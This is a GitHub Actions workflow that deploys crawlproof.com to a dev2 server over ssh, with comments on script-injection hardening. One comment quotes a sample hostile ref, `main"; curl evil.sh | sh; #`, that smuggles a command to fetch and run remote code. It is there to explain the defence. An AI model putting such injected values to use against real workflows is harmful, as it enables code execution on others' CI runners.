-
Notifications
You must be signed in to change notification settings - Fork 0
81 lines (74 loc) · 3.04 KB
/
Copy pathdeploy-dev2.yml
File metadata and controls
81 lines (74 loc) · 3.04 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
name: Deploy to dev2
# Replaces Railway's git-push auto-deploy. Railway watched this repo and
# redeployed on every push to main; this does the same thing against dev2.
#
# The build happens ON dev2, not here: the image bakes NEXT_PUBLIC_* in at
# build time and those values live in /home/anthony/www/crawlproof.com/app.env,
# which never leaves the box. CI only needs to be able to ssh in.
#
# Secrets required:
# DEV2_SSH_KEY private key for the deploy account on dev2
# DEV2_HOST dev2.profullstack.com
# DEV2_USER anthony
# DEV2_KNOWN_HOSTS output of `ssh-keyscan dev2.profullstack.com`
on:
push:
# master, not main — this repo's default branch is master, and a workflow
# watching main would simply never fire.
branches: [master]
workflow_dispatch:
inputs:
ref:
description: Git ref to deploy (defaults to the pushed commit)
required: false
type: string
concurrency:
# One deploy at a time; a newer push should wait rather than race a build
# that is already halfway through `next build` on the box.
group: deploy-dev2
cancel-in-progress: false
jobs:
deploy:
runs-on: ubuntu-latest
timeout-minutes: 45
steps:
# Every ${{ }} below goes through env, never straight into the shell.
# `inputs.ref` is attacker-controllable through workflow_dispatch, and
# interpolating it into a `run:` body is script injection: a ref like
# `main"; curl evil.sh | sh; #` would execute on the runner.
- name: Resolve target revision
id: rev
env:
REF: ${{ inputs.ref || github.sha }}
run: echo "sha=$REF" >> "$GITHUB_OUTPUT"
- name: Set up ssh
env:
SSH_KEY: ${{ secrets.DEV2_SSH_KEY }}
KNOWN_HOSTS: ${{ secrets.DEV2_KNOWN_HOSTS }}
run: |
install -d -m 700 ~/.ssh
printf '%s\n' "$SSH_KEY" > ~/.ssh/id_ed25519
chmod 600 ~/.ssh/id_ed25519
printf '%s\n' "$KNOWN_HOSTS" > ~/.ssh/known_hosts
chmod 644 ~/.ssh/known_hosts
- name: Deploy
env:
DEV2_USER: ${{ secrets.DEV2_USER }}
DEV2_HOST: ${{ secrets.DEV2_HOST }}
SHA: ${{ steps.rev.outputs.sha }}
run: |
# The sha is passed as a positional argument rather than being
# spliced into the remote command string, so a hostile ref cannot
# extend the command that runs on dev2 either.
ssh -o BatchMode=yes "$DEV2_USER@$DEV2_HOST" \
/home/anthony/www/crawlproof.com/deploy-app.sh "$SHA"
- name: Verify the site answers over TLS
# deploy-app.sh already health-checks on loopback; this proves nginx and
# the certificate in front of it are serving the new container too.
run: |
for i in $(seq 1 10); do
code=$(curl -s -o /dev/null -w '%{http_code}' https://crawlproof.com/ || true)
if [ "$code" = 200 ]; then echo "crawlproof.com 200"; exit 0; fi
echo "attempt $i: $code"; sleep 10
done
echo "crawlproof.com never returned 200"; exit 1